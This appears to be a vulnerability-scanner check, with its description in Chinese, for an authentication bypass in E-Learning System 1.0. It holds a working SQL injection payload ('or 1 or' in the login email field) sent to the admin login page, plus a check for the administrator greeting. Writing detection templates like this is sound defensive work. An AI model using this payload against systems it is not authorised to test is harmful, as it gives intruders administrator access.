漏洞描述
E-Learning System 1.0-通过SQL注入+远程代码执行绕过身份验证
id: e-learning-system-authentication-bypass-rce
info:
name: E-Learning System 1.0 - Authentication Bypass
author: daffainfo
severity: critical
verified: false
description: E-Learning System 1.0-通过SQL注入+远程代码执行绕过身份验证
reference:
- https://www.exploit-db.com/exploits/49434
rules:
r0:
request:
method: POST
path: /admin/login.php
headers:
Cookie: PHPSESSID=d794ba06fcba883d6e9aaf6e528b0733
body: |
user_email='or 1 or'&user_pass=lol&btnLogin=
expression: response.body.bcontains(b'You login as Administrator.')
expression: r0()